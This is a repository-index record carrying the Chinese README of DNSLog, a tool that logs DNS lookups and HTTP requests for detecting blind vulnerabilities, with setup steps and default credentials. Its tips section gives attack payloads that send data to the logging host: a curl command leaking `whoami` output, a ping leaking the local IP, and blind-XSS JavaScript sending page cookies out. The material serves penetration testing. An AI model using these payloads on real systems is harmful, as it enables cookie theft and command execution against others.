{"id":13539991,"url":"https://github.com/bugscanteam/dnslog","last_synced_at":"2025-09-27T10:30:36.143Z","repository":{"id":37734460,"uuid":"58205663","full_name":"BugScanTeam/DNSLog","owner":"BugScanTeam","description":"DNSLog 是一款监控 DNS 解析记录和 HTTP 访问记录的工具。","archived":true,"fork":false,"pushed_at":"2018-11-14T09:07:59.000Z","size":50,"stargazers_count":1415,"open_issues_count":5,"forks_count":462,"subscribers_count":41,"default_branch":"master","last_synced_at":"2024-11-19T10:49:23.747Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/BugScanTeam.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2016-05-06T12:27:07.000Z","updated_at":"2024-11-09T02:59:56.000Z","dependencies_parsed_at":"2022-07-08T04:48:01.001Z","dependency_job_id":null,"html_url":"https://github.com/BugScanTeam/DNSLog","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BugScanTeam%2FDNSLog","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BugScanTeam%2FDNSLog/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BugScanTeam%2FDNSLog/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/BugScanTeam%2FDNSLog/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/BugScanTeam","download_url":"https://codeload.github.com/BugScanTeam/DNSLog/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":234426029,"owners_count":18830833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-08-01T09:01:36.829Z","updated_at":"2025-09-27T10:30:35.767Z","avatar_url":"https://github.com/BugScanTeam.png","language":"Python","funding_links":[],"categories":["\u003ca id=\"a76463feb91d09b3d024fae798b92be6\"\u003e\u003c/a\u003e侦察\u0026\u0026信息收集\u0026\u0026子域名发现与枚举\u0026\u0026OSINT","\u003ca id=\"170048b7d8668c50681c0ab1e92c679a\"\u003e\u003c/a\u003e工具"],"sub_categories":["\u003ca id=\"a695111d8e30d645354c414cb27b7843\"\u003e\u003c/a\u003eDNS"],"readme":"```\n ____  _   _ ____  _\n|  _ \\| \\ | / ___|| |    ___   __ _\n| | | |  \\| \\___ \\| |   / _ \\ / _` |\n| |_| | |\\  |___) | |__| (_) | (_| |\n|____/|_| \\_|____/|_____\\___/ \\__, |\n                              |___/\n```\n[![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/)   [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/BugScanTeam/dnslog/master/GPL-2.0) \n\n简介\n---\n\nDNSLog 是四叶草安全旗下 BugscanTeam 打造的一款监控 DNS 解析记录和 HTTP 访问记录的工具，在检测盲注类漏洞时有着非常重要的作用，是分布式漏洞扫描框架 BugScan 中核心库之一。\n\nDNSLog 基于 Django 框架编写，将 DNSServer 集成进 DNSLog 中，使用者可轻松搭建使用环境。\n\n你可以点击这里访问： [演示站点](https://admin.dnslog.link)\n\n安装\n---\n\n1. 获取源代码\n\n 你可以通过用 Git 来克隆代码仓库中的最新源代码\n\n ```\n $ git clone git@github.com:BugScanTeam/DNSLog.git\n ```\n\n 或者你可以点击 [这里](https://github.com/BugScanTeam/DNSLog/archive/master.zip) 下载最新的源代码 zip 包,并解压\n\n ```\n $ wget https://github.com/BugScanTeam/DNSLog/archive/master.zip\n $ unzip master.zip\n ```\n\n2. 安装依赖环境\n\n DNSLog 使用前需要安装 Django 1.8 与 dnslib ，如果已经安装可跳过此步\n\n ```\n $ cd dnslog\n $ pip install -r requirements.pip\n ```\n3. 域名与公网 IP 准备\n    \n    搭建并使用 DNSLog，你需要拥有两个域名，一个域名作为 NS 服务器域名(例:a.com)，一个用于记录域名(例: b.com)。还需要有一个公网 IP 地址(如：1.1.1.1)\n    \n    **注意：b.com 的域名提供商需要支持自定义 NS 记录, a.com 则无要求。**\n    \n    1. 在 a.com 中设置两条 A 记录：\n\n        ```\n        ns1.a.com  A 记录指向  1.1.1.1        \n        ns2.a.com  A 记录指向  1.1.1.1\n        ```\n    2. 修改 b.com 的 NS 记录为 1 中设定的两个域名\n\n        \u003e 本步骤中，需要在域名提供商提供的页面进行设置，部分域名提供商只允许修改 NS 记录为已经认证过的 NS 地址。所以需要找一个支持修改 NS 记录为自己 NS 的域名提供商。\n    \n    **注意: NS 记录修改之后部分地区需要 24-48 小时会生效**\n\n4. 修改配置文件\n    \n 修改 `dnslog/dnslog/settings.py` 文件中相关配置：\n \n \u003e 配置文件中的域名对应关系与步骤 3 相同\n \n ```\n    # 做 dns 记录的域名\n    DNS_DOMAIN = 'b.com'\n    \n    # 记录管理的域名, 这里前缀根据个人喜好来定\n    ADMIN_DOMAIN = 'admin.b.com'\n    \n    # NS域名\n    NS1_DOMAIN = 'ns1.a.com'\n    NS2_DOMAIN = 'ns2.a.com'\n    \n    # 服务器外网地址\n    SERVER_IP = '1.1.1.1'\n ```\n\n5. 启动服务\n\n ```\n $ cd dnslog/\n $ sudo python manage.py runserver 0.0.0.0:80\n ```\n \n **Django web 默认启动端口为 8000，若要启动在 80 端口则需要 root 权限**\n \n \u003e 如果不想启动在 80 端口，但又想在使用 HTTP 的时候不加端口号，可以自己安装 Nginx，对 b.com 做反向代理\n \n Nginx 反向代理参考脚本：\n \n```nginx\nserver {\n        listen 443;\n        ssl on;\n        ssl_certificate /etc/nginx/certs/*.xxx.com/fullchain;\n        ssl_certificate_key /etc/nginx/certs/*.xxx.com/key;\n        server_name *.hackhttp.com;\n        location /static {\n                alias /var/www/dnslog/static;\n        }\n        location / {\n                proxy_pass http://127.0.0.1:8000/;\n                proxy_redirect off;\n                proxy_set_header Host $host;\n                proxy_set_header X-Real-IP $remote_addr;\n                proxy_set_header X-Forwarded-For $remote_addr;\n                proxy_set_header X-Forwarded-Proto $scheme;\n        }\n\n}\n```\n\n6. https泛证书申请(let's encrypt)\n\n    1. 安装acme `curl  https://get.acme.sh | sh`\n    1. 单独启动dns服务器 `python zoneresolver.py`\n    1. 添加acme的api脚本\n        ```bash\n        cp acme.sh/dns_log.sh /root/.acme.sh/dnsapi/dns_log.sh\n        chmod +x /root/.acme.sh/dnsapi/dns_log.sh\n        ```\n    1. 申请证书\n\n        `acme.sh --issue -d \"*.xxx.com\" --dns dns_log --debug --dnssleep 10`\n\n    1. 安装证书\n\n        ```bash\n        mkdir -p /etc/nginx/certs/\\*.xxx.com/\n        acme.sh --install-cert -d \\*.xxx.com \\\n        --cert-file /etc/nginx/certs/\\*.xxx.com/cert \\\n        --key-file /etc/nginx/certs/\\*.xxx.com/key \\\n        --fullchain-file /etc/nginx/certs/\\*.xxx.com/fullchain \\\n        --reloadcmd \"nginx -s reload\"\n        ```\n\n    acme会自动检查证书是否过期，当申请到新证书后也会自动重启nginx让证书生效\n\n---\n\n### 站点管理\n\n 启动服务成功后，访问 `http://b.com/admin/` 进入后台\n \n \u003e 管理员用户名密码默认均为 admin\n \n 如果忘记管理员密码，可进入 dnslog 目录下，执行如下命令重设管理员密码\n \n ```\n python manage.py changepassword admin \n ```\n\n### 普通用户\n\n 在 User 表中添加使用用户的信息，表中默认已经存在 `test/123456` 这个用户。\n \n 访问 `http://admin.b.com` (ADMIN_DOMAIN 指定的域名)，输入用户名密码登录。\n \n 访问后会在下方看到自己的二级域名，例如 test.b.com，当请求 test.b.com 这个二级域名下的任意子域时，都会被记录，例如: demo.test.b.com。\n\n使用技巧\n---\n\n### 命令盲注利用\n\n对于一些命令盲注类的漏洞，可以通过 DNSLog 中的 WebLog 部分将其转化为有回显的命令执行：\n\n```\ncurl \"http://testhash.test.dnslog.link/?`whoami`\"\n```\n\n**在 Web 控制台下看到结果：**\n\n\\#    |    path    |    ip    |    ua    | date\n---|---|---|---|---\n146    | testhash.test.dnslog.link/?root |    xxx.xxx.xxx.xxx |    curl/7.43.0    | 2016-05-10 07:36:47\n\n\n### DNS记录中获取源IP地址\n\n详见 [issue#3](https://github.com/BugScanTeam/DNSLog/issues/3)\n\n```\nping -c 3 `ifconfig en0|grep \"inet \"|awk '{print $2}'`.test.dnslog.link\n```\n\n效果如下：\n\n```\n➜  ~ ping -c 3 `ifconfig en0|grep \"inet \"|awk '{print $2}'`.test.dnslog.link\nPING 192.168.10.167.test.dnslog.link (106.186.118.146): 56 data bytes\n64 bytes from 106.186.118.146: icmp_seq=0 ttl=52 time=259.491 ms\n64 bytes from 106.186.118.146: icmp_seq=1 ttl=52 time=307.566 ms\n64 bytes from 106.186.118.146: icmp_seq=2 ttl=52 time=352.757 ms\n\n--- 192.168.10.167.test.dnslog.link ping statistics ---\n3 packets transmitted, 3 packets received, 0.0% packet loss\nround-trip min/avg/max/stddev = 259.491/306.605/352.757/38.082 ms\n```\n\n### XSS 盲打\n\n在有 XSS 漏洞的页面加入类似如下代码：\n\n```\nvar s=document.createElement('img');\ns.src=\"http://xss.test.dnslog.link/?url=\"+document.location+\"\u0026cookie=\"+document.cookie;\ndocument.head.appendChild(s);\n```\n\n以 `httpbin.org` 为例，一旦触发，在 WebLog 中可以看到：\n\n\\#    |    path    |    ip    |    ua    | date\n---|---|---|---|---\n146    | xss.test.dnslog.link/?url=http://httpbin.org/\u0026cookie=_ga=GA1.2.17.142 |    xxx.xxx.xxx.xxx |    Mozilla/5.0 xxx    | 2016-06-18\n\n\n相关链接\n---\n\n* [版权声明](./GPL-2.0)\n* [BugScan 社区官网](http://www.bugscan.net)\n* [DNSLog 示例站点](http://admin.dnslog.link/)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbugscanteam%2Fdnslog","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fbugscanteam%2Fdnslog","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fbugscanteam%2Fdnslog/lists"}